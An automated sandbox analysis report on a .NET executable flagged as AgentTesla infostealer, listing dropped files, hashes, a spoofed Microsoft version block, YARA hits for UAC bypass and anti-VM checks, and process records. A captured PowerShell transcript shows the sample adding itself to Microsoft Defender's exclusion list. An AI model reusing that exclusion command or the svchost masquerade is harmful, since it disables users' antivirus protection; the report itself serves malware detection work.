                                                                                                                  SSDEEP:96:BZx/GN0NqDo1Z2eZB/GN0NqDo1Zs4z+zQzjZT/GN0NqDo1Zw5zAzAz4Zn:B
                                                                                                                  MD5:FF457E1B47D5AFE9390B49F3317BAA79
                                                                                                                  SHA1:FEDC428467F1FB3D35B3F839596F8B54B5A8EEEA
                                                                                                                  SHA-256:B6BC45334C5760A4A6F68CC2E0CE1C44B85170FB6443712F96B16858908CFD76
                                                                                                                  SHA-512:E9CF0C7EE0AAD3AFEF07A6356085F74361B93E21BE4F4ADE5A9801F6C3084D19B8BD4BB994CCD2C560C1C76F0645AD82DB086F2445172160A2A9D459C22EF983
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 6288..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152058..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152410..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:VknMvPoCXZ.exe
                                                                                                                  File size:780216
                                                                                                                  MD5:0cecfa83ee6ea6dd1de38462bbedf15c
                                                                                                                  SHA1:de4dde34707658d98f50de8cf2a182bf7ded2a45
                                                                                                                  SHA256:a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
                                                                                                                  SHA512:cedfcb1fbbcfc9c0592d346295c1225b926d4c7246a81f98cb4e50007629c4f60deb9c1f8a539c353835d1213f2c291d81996b6f327a27dad38e4b1e4bcedd86
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4be619
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                  Time Stamp:0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                                  Error Number:-2146762495
                                                                                                                  Not Before, Not After
                                                                                                                  • 7/7/2021 5:00:00 PM 7/8/2022 4:59:59 PM
                                                                                                                  Subject Chain
                                                                                                                  • CN=Afia Wave Enterprises Oy, O=Afia Wave Enterprises Oy, L=Helsinki, S=Uusimaa, C=FI
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:4D53204310277C51FA444D3365AA03EB
                                                                                                                  Thumbprint SHA-1:9B6F3B3CD33AE938FBC5C95B8C9239BAC9F9F7BF
                                                                                                                  Thumbprint SHA-256:999BBF99F3B3C1A894340918D8F2C6A358E7EC6299BAB5D8FD6B9E7570ABF929
                                                                                                                  Serial:69AD1E8B5941C93D5017B7C3FDB8E7B6

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbe5240x4a.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x548.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xbd2000x15b8
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xbe56e0x38.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000xbc61f0xbc800False0.683798387765data6.54480652583IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xc00000x5480x600False0.333984375data3.74389579657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_GROUP_ICON0xc00a00x6data
                                                                                                                  RT_VERSION0xc00a80x49edata

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Version Infos

                                                                                                                  DescriptionData
                                                                                                                  Translation0x0000 0x04b0
                                                                                                                  LegalCopyright Microsoft Corporation.All rights reserved.
                                                                                                                  Assembly Version15.3.0.0
                                                                                                                  InternalNameMicrosoft.VisualStudio.DevOps.Telemetry.dll
                                                                                                                  FileVersion0.4.13.22810
                                                                                                                  CompanyNameMicrosoft Corporation
                                                                                                                  CommentsMicrosoft.VisualStudio.DevOps.Telemetry
                                                                                                                  ProductNameMicrosoft Visual Studio
                                                                                                                  ProductVersion0.4.13+g1a59147604.22810
                                                                                                                  FileDescriptionMicrosoft.VisualStudio.DevOps.Telemetry
                                                                                                                  OriginalFilenameMicrosoft.VisualStudio.DevOps.Telemetry.dll

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 15, 2021 15:20:21.145026922 CEST6544753192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:21.173506975 CEST53654478.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:38.187390089 CEST5244153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:38.242679119 CEST53524418.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:56.416903019 CEST6217653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:56.443344116 CEST53621768.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:56.602914095 CEST5959653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:56.630760908 CEST53595968.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:14.728933096 CEST6529653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:14.756941080 CEST53652968.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:18.132777929 CEST6318353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:18.163100004 CEST53631838.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:24.774127960 CEST6015153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:24.800704956 CEST53601518.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:25.923398972 CEST5696953192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:25.970354080 CEST53569698.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:33.151094913 CEST5516153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:33.177848101 CEST53551618.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:41.321341038 CEST5475753192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:41.357259035 CEST53547578.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:04.617964983 CEST4999253192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:04.654059887 CEST53499928.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:18.271564007 CEST6007553192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:18.317687988 CEST53600758.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:22.083347082 CEST5501653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:22.119514942 CEST53550168.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:33.184061050 CEST6434653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:33.213447094 CEST53643468.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:39.139003992 CEST5712853192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:39.166477919 CEST53571288.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.278376102 CEST5046353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.278419018 CEST5479153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.302717924 CEST53547918.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.303340912 CEST53504638.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.340203047 CEST5039453192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.367719889 CEST53503948.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:44.756346941 CEST5853053192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:44.787528038 CEST53585308.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:44.838032007 CEST5381353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:44.864212036 CEST53538138.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:45.009485960 CEST6373253192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:45.036564112 CEST53637328.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:45.690366030 CEST5734453192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:45.719934940 CEST53573448.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:50.835201979 CEST5445053192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:50.862657070 CEST53544508.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:53.097054005 CEST5926153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:53.130618095 CEST53592618.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:56.630136967 CEST5715153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:56.660283089 CEST53571518.8.8.8192.168.2.5

                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  Analysis Process: VknMvPoCXZ.exe PID: 2244 Parent PID: 2856

                                                                                                                  General

                                                                                                                  Start time:15:20:26
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\VknMvPoCXZ.exe'
                                                                                                                  Imagebase:0x200000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Reputation:low

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 3756 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 4132 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff797770000
